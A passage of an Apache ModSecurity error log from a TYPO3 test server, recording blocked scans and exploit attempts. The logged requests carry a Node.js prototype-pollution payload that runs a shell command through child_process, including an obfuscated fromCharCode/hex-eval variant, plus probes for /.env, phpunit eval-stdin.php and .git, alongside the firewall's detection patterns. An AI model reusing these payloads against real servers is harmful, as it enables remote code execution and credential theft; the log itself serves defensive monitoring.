[Thu Dec 18 14:55:13.385861 2025] [:error] [pid 813359] [client 13.52.239.86:49456] [client 13.52.239.86] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQHwbjsQ2OAT5oMPR4ukwAAAAc"]
[Thu Dec 18 14:55:13.386473 2025] [:error] [pid 813359] [client 13.52.239.86:49456] [client 13.52.239.86] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQHwbjsQ2OAT5oMPR4ukwAAAAc"]
[Thu Dec 18 14:55:13.387698 2025] [:error] [pid 813359] [client 13.52.239.86:49456] [client 13.52.239.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQHwbjsQ2OAT5oMPR4ukwAAAAc"]
[Thu Dec 18 14:55:13.387859 2025] [:error] [pid 813359] [client 13.52.239.86:49456] [client 13.52.239.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQHwbjsQ2OAT5oMPR4ukwAAAAc"]
[Thu Dec 18 15:27:37.671447 2025] [:error] [pid 813370] [client 54.193.36.208:54950] [client 54.193.36.208] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQPWb4E__wGzptGHinuJgAAAAg"]
[Thu Dec 18 15:27:37.672038 2025] [:error] [pid 813370] [client 54.193.36.208:54950] [client 54.193.36.208] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQPWb4E__wGzptGHinuJgAAAAg"]
[Thu Dec 18 15:27:37.673316 2025] [:error] [pid 813370] [client 54.193.36.208:54950] [client 54.193.36.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQPWb4E__wGzptGHinuJgAAAAg"]
[Thu Dec 18 15:27:37.673494 2025] [:error] [pid 813370] [client 54.193.36.208:54950] [client 54.193.36.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQPWb4E__wGzptGHinuJgAAAAg"]
[Thu Dec 18 16:04:19.098467 2025] [:error] [pid 813016] [client 54.241.99.66:51474] [client 54.241.99.66] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQX89oXgPZsLH_wMFNzPgAAAAA"]
[Thu Dec 18 16:04:19.099094 2025] [:error] [pid 813016] [client 54.241.99.66:51474] [client 54.241.99.66] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQX89oXgPZsLH_wMFNzPgAAAAA"]
[Thu Dec 18 16:04:19.100382 2025] [:error] [pid 813016] [client 54.241.99.66:51474] [client 54.241.99.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQX89oXgPZsLH_wMFNzPgAAAAA"]
[Thu Dec 18 16:04:19.100564 2025] [:error] [pid 813016] [client 54.241.99.66:51474] [client 54.241.99.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQX89oXgPZsLH_wMFNzPgAAAAA"]
[Thu Dec 18 18:08:07.429194 2025] [:error] [pid 818375] [client 134.199.157.117:28664] [client 134.199.157.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQ097Q9r8SVzp6kU-nguAAAAAo"]
[Thu Dec 18 18:08:07.430394 2025] [:error] [pid 818375] [client 134.199.157.117:28664] [client 134.199.157.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQ097Q9r8SVzp6kU-nguAAAAAo"]
[Thu Dec 18 18:08:07.430635 2025] [:error] [pid 818375] [client 134.199.157.117:28664] [client 134.199.157.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQ097Q9r8SVzp6kU-nguAAAAAo"]
[Thu Dec 18 18:08:08.084529 2025] [:error] [pid 818375] [client 134.199.157.117:28664] [client 134.199.157.117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aUQ0-LQ9r8SVzp6kU-ngugAAAAo"]
[Thu Dec 18 18:08:09.059809 2025] [:error] [pid 818375] [client 134.199.157.117:28664] [client 134.199.157.117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUQ0-bQ9r8SVzp6kU-ngvQAAAAo"]
[Thu Dec 18 18:08:10.121158 2025] [authz_core:error] [pid 818375] [client 134.199.157.117:28664] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Dec 18 23:24:48.521006 2025] [:error] [pid 828112] [client 54.193.18.164:41324] [client 54.193.18.164] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUR_MI7R_baa7hvGOSpPtAAAAA4"]
[Thu Dec 18 23:24:48.521625 2025] [:error] [pid 828112] [client 54.193.18.164:41324] [client 54.193.18.164] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUR_MI7R_baa7hvGOSpPtAAAAA4"]
[Thu Dec 18 23:24:48.522880 2025] [:error] [pid 828112] [client 54.193.18.164:41324] [client 54.193.18.164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUR_MI7R_baa7hvGOSpPtAAAAA4"]
[Thu Dec 18 23:24:48.523060 2025] [:error] [pid 828112] [client 54.193.18.164:41324] [client 54.193.18.164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUR_MI7R_baa7hvGOSpPtAAAAA4"]
[Fri Dec 19 20:42:30.980219 2025] [:error] [pid 834990] [client 204.76.203.25:48366] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWqpvFo6pMcMVt_qrtFvAAAAAA"]
[Fri Dec 19 20:42:30.980469 2025] [:error] [pid 834990] [client 204.76.203.25:48366] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWqpvFo6pMcMVt_qrtFvAAAAAA"]
[Fri Dec 19 20:42:30.980627 2025] [:error] [pid 834990] [client 204.76.203.25:48366] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWqpvFo6pMcMVt_qrtFvAAAAAA"]
[Sat Dec 20 15:24:55.201580 2025] [authz_core:error] [pid 856675] [client 141.98.11.181:52571] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Mon Dec 22 06:55:36.256422 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.256900 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.257415 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Rule 7f2f269b8e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.260222 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e28726571756972652c2070726f6365737329207b20202072657475726e206576616c285c75303036375c75303036635c75303036665c75303036325c75303036315c75303036635b537472696e672e66726f6d43686172436f64652836362c3131372c3130322c3130322c3130312c313134295d2e66726f6..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUjdWEjUWwmX9_yPUUjjjQAAAAg"]
[Mon Dec 22 06:55:36.260466 2025] [:error] [pid 899041] [client 207.154.244.234:24852] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,11..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag 